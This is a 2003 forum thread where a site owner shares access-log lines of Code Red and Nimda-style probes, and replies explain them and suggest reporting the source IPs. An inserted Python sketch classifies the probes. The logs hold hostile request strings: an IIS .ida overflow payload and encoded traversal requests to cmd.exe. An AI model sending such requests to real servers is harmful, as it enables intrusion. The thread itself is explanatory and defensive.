Guest quakey Posted July 30, 2003

Hi,

Frequently I got the following lines in the access log:

68.165.217.90 - - [29/Jul/2003:20:43:09 -0700] "GET /default.ida?XXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 209 "-" "-"
127.0.0.1 - - [29/Jul/2003:20:44:32 -0700] "GET / HTTP/1.0" 200 4944 "-" "mon.d/http.monitor"
68.165.90.188 - - [29/Jul/2003:20:44:57 -0700] "GET /default.ida?XXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 209 "-" "-"
68.83.63.234 - - [29/Jul/2003:20:45:01 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-"
68.83.63.234 - - [29/Jul/2003:20:45:02 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 212 "-" "-"
68.83.63.234 - - [29/Jul/2003:20:45:03 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"
68.83.63.234 - - [29/Jul/2003:20:45:05 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"
68.83.63.234 - - [29/Jul/2003:20:45:06 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
68.83.63.234 - - [29/Jul/2003:20:45:07 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"
68.83.63.234 - - [29/Jul/2003:20:45:08 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"
68.83.63.234 - - [29/Jul/2003:20:45:10 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 269 "-" "-"
68.83.63.234 - - [29/Jul/2003:20:45:12 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
68.83.63.234 - - [29/Jul/2003:20:45:13 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
68.83.63.234 - - [29/Jul/2003:20:45:15 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
68.83.63.234 - - [29/Jul/2003:20:45:17 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
68.83.63.234 - - [29/Jul/2003:20:45:18 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"
68.83.63.234 - - [29/Jul/2003:20:45:19 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"
68.83.63.234 - - [29/Jul/2003:20:45:20 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
68.83.63.234 - - [29/Jul/2003:20:45:21 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"

What are those? ppl trying to hack my server?

Thank you.

paul Posted July 30, 2003

welcome to the club :roll: everybody gets those :roll:

do you remember code red ??? the IIS and Personal Web Server worm? ... well that's what that is that you are seeing

tyme Posted July 30, 2003

thankfully you have nothing to worry about! so just ignore it ;-)

if the IP it's coming from is frequently the same, i would jump over to arin.net, do a whois on it, and send an email off to whomever the address block it's in belongs to (i would look for an abuse email address or possibly the tech email address). help stop the spread of the worm! :)
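
An added example, not part of any post in this thread: a Python sketch that groups the probe requests from the first post by source IP and checks whether any of them was actually served, which is what the advice about a frequently repeating address depends on. The category names, function names and the threshold are assumptions made for the example.

```python
import re
from collections import defaultdict

# Apache combined-log prefix: client IP, timestamp, method, path, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Request families visible in the posted log; first match wins.
# The category names are labels invented for this example.
SIGNATURES = [
    ("ida_overflow_probe", re.compile(r"^/default\.ida\?.*%u[0-9a-f]{4}", re.I)),
    ("encoded_traversal", re.compile(r"\.\.%(?:25|%|c[01]%)", re.I)),
    ("cmd_shell_probe", re.compile(r"/(?:root|cmd)\.exe\?", re.I)),
]

# Lines copied from the first post; the default.ida payload is shortened.
SAMPLE = [
    '68.165.217.90 - - [29/Jul/2003:20:43:09 -0700] "GET /default.ida?XXXXXX%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 209 "-" "-"',
    '127.0.0.1 - - [29/Jul/2003:20:44:32 -0700] "GET / HTTP/1.0" 200 4944 "-" "mon.d/http.monitor"',
    '68.83.63.234 - - [29/Jul/2003:20:45:01 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-"',
    '68.83.63.234 - - [29/Jul/2003:20:45:03 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"',
    '68.83.63.234 - - [29/Jul/2003:20:45:06 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"',
    '68.83.63.234 - - [29/Jul/2003:20:45:15 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"',
    '68.83.63.234 - - [29/Jul/2003:20:45:19 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"',
]

def classify(path):
    """Return the first matching category name, or None for ordinary requests."""
    return next((name for name, rx in SIGNATURES if rx.search(path)), None)

def summarize(lines):
    """Per source IP: hits per category, plus how many probes got a 2xx/3xx."""
    report = defaultdict(lambda: {"hits": defaultdict(int), "served": 0})
    for line in lines:
        m = LOG_RE.match(line)
        category = classify(m.group(4)) if m else None
        if category is None:
            continue  # unparseable line or normal traffic
        entry = report[m.group(1)]
        entry["hits"][category] += 1
        entry["served"] += m.group(5)[0] in "23"  # 404/400: nothing was served
    return dict(report)

def repeat_sources(report, threshold=3):
    """IPs that probed at least `threshold` times: candidates for a whois lookup."""
    return sorted(ip for ip, e in report.items() if sum(e["hits"].values()) >= threshold)

if __name__ == "__main__":
    for ip, e in summarize(SAMPLE).items():
        print(ip, dict(e["hits"]), "served:", e["served"])
    print("repeat sources:", repeat_sources(summarize(SAMPLE)))
```

A non-zero `served` count for any address is the case that needs a closer look; in the posted log every probe was answered with 404 or 400.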

Guest anon Posted July 30, 2003

Hey tyme, just had to scroll three miles to the right to read your post

tyme Posted July 30, 2003

> Hey tyme, just had to scroll three miles to the right to read your post

not my fault! it was the length of the original post which caused the stretched box. but i dropped a return into my post so that people wouldn't have to scroll :) (or at least not much...not sure if it renders much differently on my 1600x1200 screen as it would on smaller resolutions)

Guest anon Posted July 30, 2003

You're right again tyme, sorry

Edited the first post to make it shorter, now it's only a one mile scroll.